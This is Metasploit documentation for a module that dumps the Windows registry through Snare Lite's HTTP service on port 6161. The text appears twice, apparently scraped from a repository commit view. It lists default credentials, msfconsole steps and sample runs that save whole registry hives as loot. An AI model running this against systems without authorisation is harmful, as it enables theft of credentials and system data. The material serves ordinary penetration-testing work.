metasploit-framework/documentation/modules/auxiliary/gather/snare_registry.md

## Description

  This module uses the Registry Dump feature of the [Snare Lite for Windows](https://sourceforge.net/projects/snare/) HTTP service on 6161/TCP to retrieve the Windows registry. The Dump Registry functionality is unavailable in Snare Enterprise.

  Note: The Dump Registry functionality accepts only one connected client at a time. Requesting a large key/hive will cause the service to become unresponsive until the server completes the request.


## Vulnerable Application

  SNARE (System iNtrusion Analysis and Reporting Environment) is a series of log collection agents that facilitate centralised analysis of audit log data.

  This module has been tested successfully with Snare Lite for Windows version 4.0.2.0 on Windows XP SP3.

  Installers for Snare Lite are no longer available and the product is unsupported.


## Verification Steps

  1. Start `msfconsole`
  2. Do: `use auxiliary/gather/snare_registry`
  3. Do: `set rhost [IP]`
  4. Do: `set HttpUsername [USERNAME]`
  5. Do: `set HttpPassword [PASSWORD]`
  6. Do: `run`
  7. You should get a copy of *HKLM\HARDWARE\DESCRIPTION\System* from the remote Windows system


## Options

**HttpUsername**

The username for Snare remote access (default: `snare`).

**HttpPassword**

The password for Snare remote access (default: blank).

**REG_DUMP_KEY**

Retrieve the specified registry key and all sub-keys.

**REG_DUMP_ALL**

Retrieve the entire Windows registry.

**TIMEOUT**

Timeout in seconds for downloading each registry key/hive.


## Scenarios

Retrieve a specific registry key:

  ```
  msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM\\HARDWARE\\DESCRIPTION\\System
  REG_DUMP_KEY => HKLM\HARDWARE\DESCRIPTION\System
  msf auxiliary(snare_registry) > run

  [*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\HARDWARE\\DESCRIPTION\\System'...
  [+] 192.168.18.155:6161 - Retrieved key successfully (23092 bytes)
  [+] File saved in: /root/.msf4/loot/20151225133011_default_192.168.18.155_snare.registry_842138.txt
  [*] Auxiliary module execution completed
  ```

Retrieve an entire hive:

  ```
  msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM
  REG_DUMP_KEY => HKLM
  msf auxiliary(snare_registry) > run

  [*] 192.168.18.155:6161 - Retrieving registry hive 'HKLM'...
  [+] 192.168.18.155:6161 - Retrieved key successfully (10657975 bytes)
  [+] File saved in: /root/.msf4/loot/20151225133147_default_192.168.18.155_snare.registry_247207.txt
  [*] Auxiliary module execution completed
  ```

Retrieve the entire registry:

  ```
  msf auxiliary(snare_registry) > set REG_DUMP_ALL true
  REG_DUMP_ALL => true
  msf auxiliary(snare_registry) > run

  [*] 192.168.18.155:6161 - Retrieving list of registry hives ...
  [+] 192.168.18.155:6161 - Found 5 registry hives (HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS)
  [*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CLASSES_ROOT'...
  [+] 192.168.18.155:6161 - Retrieved key successfully (3933816 bytes)
  [+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_070659.txt
  [*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_CONFIG'...
  [+] 192.168.18.155:6161 - Retrieved key successfully (5605 bytes)
  [+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_376606.txt
  [*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_USER'...
  [+] 192.168.18.155:6161 - Retrieved key successfully (269927 bytes)
  [+] File saved in: /root/.msf4/loot/20151225133223_default_192.168.18.155_snare.registry_653681.txt
  [*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_LOCAL_MACHINE'...
  [+] 192.168.18.155:6161 - Retrieved key successfully (11446508 bytes)
  [+] File saved in: /root/.msf4/loot/20151225133336_default_192.168.18.155_snare.registry_003003.txt
  [*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_USERS'...
  [+] 192.168.18.155:6161 - Retrieved key successfully (1668306 bytes)
  [+] File saved in: /root/.msf4/loot/20151225133342_default_192.168.18.155_snare.registry_236335.txt
  [*] Auxiliary module execution completed
  ```
Add documentation 2017-05-30 09:29:01 +00:00			`## Description`

			`This module uses the Registry Dump feature of the [Snare Lite for Windows](https://sourceforge.net/projects/snare/) HTTP service on 6161/TCP to retrieve the Windows registry. The Dump Registry functionality is unavailable in Snare Enterprise.`

			`Note: The Dump Registry functionality accepts only one connected client at a time. Requesting a large key/hive will cause the service to become unresponsive until the server completes the request.`


			`## Vulnerable Application`

			`SNARE (System iNtrusion Analysis and Reporting Environment) is a series of log collection agents that facilitate centralised analysis of audit log data.`

			`This module has been tested successfully with Snare Lite for Windows version 4.0.2.0 on Windows XP SP3.`

			`Installers for Snare Lite are no longer available and the product is unsupported.`


			`## Verification Steps`

			1. Start `msfconsole`
			2. Do: `use auxiliary/gather/snare_registry`
			3. Do: `set rhost [IP]`
			4. Do: `set HttpUsername [USERNAME]`
			5. Do: `set HttpPassword [PASSWORD]`
			6. Do: `run`
			`7. You should get a copy of HKLM\HARDWARE\DESCRIPTION\System from the remote Windows system`


			`## Options`

			`HttpUsername`

			The username for Snare remote access (default: `snare`).

			`HttpPassword`

			`The password for Snare remote access (default: blank).`

			`REG_DUMP_KEY`

			`Retrieve the specified registry key and all sub-keys.`

			`REG_DUMP_ALL`

			`Retrieve the entire Windows registry.`

			`TIMEOUT`

			`Timeout in seconds for downloading each registry key/hive.`


			`## Scenarios`

			`Retrieve a specific registry key:`

			```
			`msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM\\HARDWARE\\DESCRIPTION\\System`
			`REG_DUMP_KEY => HKLM\HARDWARE\DESCRIPTION\System`
			`msf auxiliary(snare_registry) > run`

			`[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\HARDWARE\\DESCRIPTION\\System'...`
			`[+] 192.168.18.155:6161 - Retrieved key successfully (23092 bytes)`
			`[+] File saved in: /root/.msf4/loot/20151225133011_default_192.168.18.155_snare.registry_842138.txt`
			`[*] Auxiliary module execution completed`
			```

			`Retrieve an entire hive:`

			```
			`msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM`
			`REG_DUMP_KEY => HKLM`
			`msf auxiliary(snare_registry) > run`

			`[*] 192.168.18.155:6161 - Retrieving registry hive 'HKLM'...`
			`[+] 192.168.18.155:6161 - Retrieved key successfully (10657975 bytes)`
			`[+] File saved in: /root/.msf4/loot/20151225133147_default_192.168.18.155_snare.registry_247207.txt`
			`[*] Auxiliary module execution completed`
			```

			`Retrieve the entire registry:`

			```
			`msf auxiliary(snare_registry) > set REG_DUMP_ALL true`
			`REG_DUMP_ALL => true`
			`msf auxiliary(snare_registry) > run`

			`[*] 192.168.18.155:6161 - Retrieving list of registry hives ...`
			`[+] 192.168.18.155:6161 - Found 5 registry hives (HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS)`
			`[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CLASSES_ROOT'...`
			`[+] 192.168.18.155:6161 - Retrieved key successfully (3933816 bytes)`
			`[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_070659.txt`
			`[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_CONFIG'...`
			`[+] 192.168.18.155:6161 - Retrieved key successfully (5605 bytes)`
			`[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_376606.txt`
			`[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_USER'...`
			`[+] 192.168.18.155:6161 - Retrieved key successfully (269927 bytes)`
			`[+] File saved in: /root/.msf4/loot/20151225133223_default_192.168.18.155_snare.registry_653681.txt`
			`[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_LOCAL_MACHINE'...`
			`[+] 192.168.18.155:6161 - Retrieved key successfully (11446508 bytes)`
			`[+] File saved in: /root/.msf4/loot/20151225133336_default_192.168.18.155_snare.registry_003003.txt`
			`[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_USERS'...`
			`[+] 192.168.18.155:6161 - Retrieved key successfully (1668306 bytes)`
			`[+] File saved in: /root/.msf4/loot/20151225133342_default_192.168.18.155_snare.registry_236335.txt`
			`[*] Auxiliary module execution completed`
			```